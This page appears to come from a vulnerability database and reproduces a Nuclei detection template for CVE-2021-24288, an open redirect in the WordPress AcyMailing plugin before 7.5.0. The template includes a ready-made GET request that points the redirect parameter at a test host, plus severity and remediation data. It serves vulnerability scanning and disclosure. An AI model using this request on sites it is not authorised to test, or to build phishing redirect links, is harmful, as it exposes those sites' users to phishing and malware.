CVE-2021-24288: WordPress AcyMailing <7.5.0 - Open Redirect

2025-08-01 WordPress AcyMailing PoC Public

Description

WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.

PoC

id: CVE-2021-24288

info:
  name: WordPress AcyMailing <7.5.0 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24288
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24288
    cwe-id: CWE-601
    epss-score: 0.01939
    epss-percentile: 0.7909
    cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acymailing
    product: acymailing
    framework: wordpress
  tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220389aaf33b201e1561db47bb4bbe5015593817cef3323f6d36f4a96ed0aef3dcd022100a6815c197dd43245d9d1ea215334a5a68d1d13000b958eeedcf651adc01de5bd:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities